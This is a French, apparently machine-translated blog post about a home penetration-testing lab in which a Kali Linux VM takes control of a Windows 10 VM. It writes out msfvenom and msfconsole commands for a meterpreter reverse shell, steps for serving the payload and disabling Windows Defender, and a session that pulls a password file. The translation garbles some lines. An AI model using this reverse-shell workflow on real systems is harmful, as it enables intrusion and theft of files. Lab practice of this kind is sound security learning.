[LINUX] Premier hack de Windows 10

Je veux connaître la méthode d'attaque et devenir une personne très consciente de la sécurité. Parce que c'est devant le bâtiment, les pirates sont cool, non? J'ai commencé à pratiquer le piratage avec le motif.

C'est le 4ème jour du calendrier de l'Avent de PRO Co., Ltd. Il ne s'agit pas de faire quelque chose, mais pardonnez-moi de dire "J'aurais aimé l'avoir!" ...

Choses à faire

Construisez un environnement expérimental Windows avec VM, attaque et contrôle à distance depuis un autre environnement (Kali Linux). C'est plus long, mais il y a plus d'images.

* Non, absolument.

Cet article ne recommande pas les cyberattaques telles que l'accès non autorisé. Veuillez ne pas appliquer le contenu présenté ici à l'environnement externe.

préparer

Tout d'abord, créez le terminal d'attaque et le terminal cible avec VM. Cette fois, cela a été fait dans l'environnement suivant.

Construire un environnement d'attaque

Kali Linux est une distribution Linux utilisée pour les tests de pénétration. Il est basé sur Debian et est pré-installé avec plus de 300 outils de test de pénétration.

J'utiliserai Kali Linux cette fois, mais il est possible d'installer l'outil d'attaque sur le système d'exploitation que vous connaissez.

Installation de Kali Linux

Téléchargez l'image Kali Linux à partir de la page suivante. https://www.kali.org/downloads/ Cette fois, j'ai téléchargé "Kali Linux 64-Bit".

Dans cet article, je vais omettre la méthode d'installation détaillée.

Construire un environnement Windows expérimental

Téléchargez l'image Windows 10

Téléchargez le fichier ISO de Windows 10 à partir de la page suivante. https://www.microsoft.com/ja-jp/software-download/windows10ISO

Création de VM

Créez une machine virtuelle à partir d'une nouvelle VirtualBox. スクリーンショット 2019-12-01 20.42.31.png スクリーンショット 2019-12-01 20.43.16.png スクリーンショット 2019-12-01 20.43.43.png スクリーンショット 2019-12-01 20.43.58.png スクリーンショット 2019-12-01 20.44.35.png スクリーンショット 2019-12-01 20.44.55.png スクリーンショット 2019-12-01 20.45.06.png C'est fait.

Installation et configuration

--Supprimez le fichier ISO du lecteur virtuel Quittez Windows 10 une fois et ouvrez Paramètres VirtualBox> Stockage. Cliquez sur l'icône du disque à droite du lecteur optique et sélectionnez Supprimer le disque du lecteur virtuel. スクリーンショット 2019-12-01 22.06.23.png

Vous êtes prêt à partir!

Attaque (histoire principale)

Cette expérience d'attaque sera menée dans l'environnement suivant. Le terminal d'attaque et le terminal cible doivent être sur le même réseau.

Terminal adresse IP
Kali Linux (terminal d'attaque) 10.0.0.2
Windows10 (terminal cible) 10.0.0.102

Autoriser les terminaux d'attaque à contrôler les terminaux cibles

Créez un shell inversé avec Metasploit Framework et exécutez-le sur le périphérique cible.

Qu'est-ce que Metasploit Framework?

Il s'agit d'un outil de test de pénétration open source qui peut effectuer une série d'intrusions sur le serveur telles que l'enquête, l'intrusion, l'attaque, l'installation de porte dérobée et la connexion. Il est fourni par défaut dans Kali Linux.

Créer une charge utile

Une charge utile est un code exécutable qui se comporte de manière malveillante. Cette fois, nous allons créer une charge utile TCP reverse shell.

La commande suivante crée un shell inverse TCP qui cible les fenêtres 64 bits et spécifie la destination de la connexion en tant que terminal d'attaque (10.0.0.2).

# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 -f exe -o /root/Desktop/evil.exe

Rendre le fichier exécutable accessible de l'extérieur

La charge utile créée doit être exécutée par le terminal cible d'une manière ou d'une autre. Cette fois, démarrez Apache pour qu'il soit accessible depuis le navigateur du terminal cible.

# mkdir /var/www/html/share
# cp /root/Desktop/evil.exe /var/www/html/share/
# service apache2 restart

Demandez au terminal cible de télécharger la charge utile

Accédez à http://10.0.0.2/share depuis le navigateur du côté windows10. スクリーンショット 2019-12-04 7.37.36.png

J'ai confirmé que evil.exe existe, je vais donc le télécharger.

Lorsque j'ai cliqué sur evil.exe et choisi de l'exécuter, il a échoué car il a été détecté comme un virus par l'antivirus Windows Defender. スクリーンショット 2019-12-04 7.40.05.png

Si vous cliquez sur la notification en bas à droite, vous serez un peu excité de voir le nom du cheval de Troy que vous avez entendu. スクリーンショット 2019-12-04 8.14.08.png

Lorsque j'ai sélectionné "Autoriser" dans "Opération" et que j'ai essayé de l'enregistrer à nouveau, l'affichage a changé. Dans cet état, cliquez sur Exécuter pour enregistrer. スクリーンショット 2019-12-04 8.14.42.png

Désactivez ensuite la «protection en temps réel» dans le Centre de sécurité Windows Defender et téléchargez à nouveau. スクリーンショット 2019-12-04 8.19.15.png Veuillez vous reporter ici (https://121ware.com/qasearch/1007/app/servlet/relatedqa?QID=018503) pour la méthode de configuration détaillée.

スクリーンショット 2019-12-04 8.21.39.png Cette fois, le téléchargement a réussi sans aucun avertissement.

Lorsque vous ouvrez le dossier, vous pouvez voir qu'il existe deux fichiers, l'un enregistré lorsque la protection en temps réel est activée (evil.exe) et l'autre enregistré lorsque la protection en temps réel est désactivée (evil (1) .exe). スクリーンショット 2019-12-04 8.28.52.png

Attendez la coque inversée du côté attaquant

Exécutez la commande suivante sur le terminal attaquant et attendez la connexion par le shell inversé.

# msfconsole      <----contribution
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


       =[ metasploit v5.0.62-dev                          ]
+ -- --=[ 1949 exploits - 1090 auxiliary - 334 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]


 msf5> utiliser exploit / multi / handler <---- input
 msf5 exploit (multi / handler)> définir la charge utile windows / x64 / meterpreter / reverse_tcp <---- input
payload => windows/x64/meterpreter/reverse_tcp
 exploit msf5 (multi / handler)> set LHOST 10.0.0.2 <---- entrée
LHOST=>10.0.0.2
 exploit msf5 (multi / gestionnaire)> exploit -j -z <---- entrée
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

 [*] Démarrage du gestionnaire TCP inversé sur 10.0.0.2: 4444 <---- Démarrer l'écoute
msf5 exploit(multi/handler) > 

###Exécutez la charge utile sur le terminal cible

Exécutez la charge utile côté Windows. Celui téléchargé lorsque la protection en temps réel est activée et celui téléchargé lorsque la protection en temps réel est désactivée sont exécutés au total quatre fois dans le schéma de la protection en temps réel activée et désactivée, respectivement.

[Au moment du téléchargement]
Protection en temps réel activée
(evil.exe)
[Au moment du téléchargement]
Protection en temps réel désactivée
(evil(1).exe)
【Durée】
Protection en temps réel activée
Échec d'attaque Échec d'attaque
【Durée】
Protection en temps réel désactivée
Échec d'attaque Attaque réussie

Tous donnent un avertissement au moment de l'exécution, mais des détails>Exécuter de force par exécution. Capture d'écran 2019-12-04 9.00.17.png

Cliquez ici pour afficher l'écran au moment de l'échec. Capture d'écran 2019-12-04 9.03.19.png

En cas de succès, ce qui suit sera affiché sur la console attaquante.

msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.0.0.102
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.102:49975) at 2019-12-04 09:08:01 +0900

Dans cet état, appuyez sur Entrée, puis utilisez la commande sessions pour afficher la liste des sessions.

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  2         meterpreter x64/windows  DESKTOP-4V3PT8F\arakawa @ DESKTOP-4V3PT8F  10.0.0.2:4444 -> 10.0.0.102:49975 (10.0.0.102)

Environnement d'attaque (10.0.0.2) pour cibler l'environnement (10).0.0.La connexion à 102) a été confirmée.

###Télécommande à l'invite de Meterpreter

Puis mot de passe pour l'expérience.Créez un fichier txt côté Windows. Capture d'écran 2019-12-04 9.16.07.png

Affichez l'invite Meterpreter en spécifiant l'ID de session côté attaquant.

msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > 

password.Trouvez et téléchargez txt.

meterpreter > pwd
C:\Users\arakawa\Downloads
meterpreter > ls
Listing: C:\Users\arakawa\Downloads
===================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-12-01 21:24:25 +0900  desktop.ini
100777/rwxrwxrwx  7168  fil   2019-12-04 08:21:32 +0900  evil (1).exe
100777/rwxrwxrwx  7168  fil   2019-12-04 09:07:02 +0900  evil.exe
100666/rw-rw-rw-  8     fil   2019-12-04 09:15:30 +0900  password.txt

meterpreter > download password.txt
[*] Downloading: password.txt -> password.txt
[*] Downloaded 8.00 B of 8.00 B (100.0%): password.txt -> password.txt
[*] download   : password.txt -> password.txt
meterpreter > 

Ouvrez un autre terminal et assurez-vous de pouvoir le télécharger.

root@kali:~# ls -la password.txt 
-rw-r--r-- 1 root root 8 Dec  4 09:15 password.txt

J'ai pu le télécharger en toute sécurité (?)! !!

#Résumé

J'ai utilisé Kali Linux pour attaquer Windows 10 et expérimenté le contrôle à distance. C'était surprenant que ce soit plus facile que ce à quoi je m'attendais. Personnellement, je pense que c'est une bonne chose que j'ai réalisé que Windows Defender fait du bon travail.

La prochaine étape est de créer une porte dérobée, d'usurper la charge utile et bien plus encore, donc je pourrais en écrire plus.

#Livre de référence

IPUSIRON "Comment créer un laboratoire de piratage: apprentissage de l'expérience de piratage dans un environnement virtuel" Shosuisha (amazon)

Recommended Posts

Premier hack de Windows 10
Suite, premier piratage de Windows 10
Premier flacon
Premier essai
Premier examen de python-
Premier gdb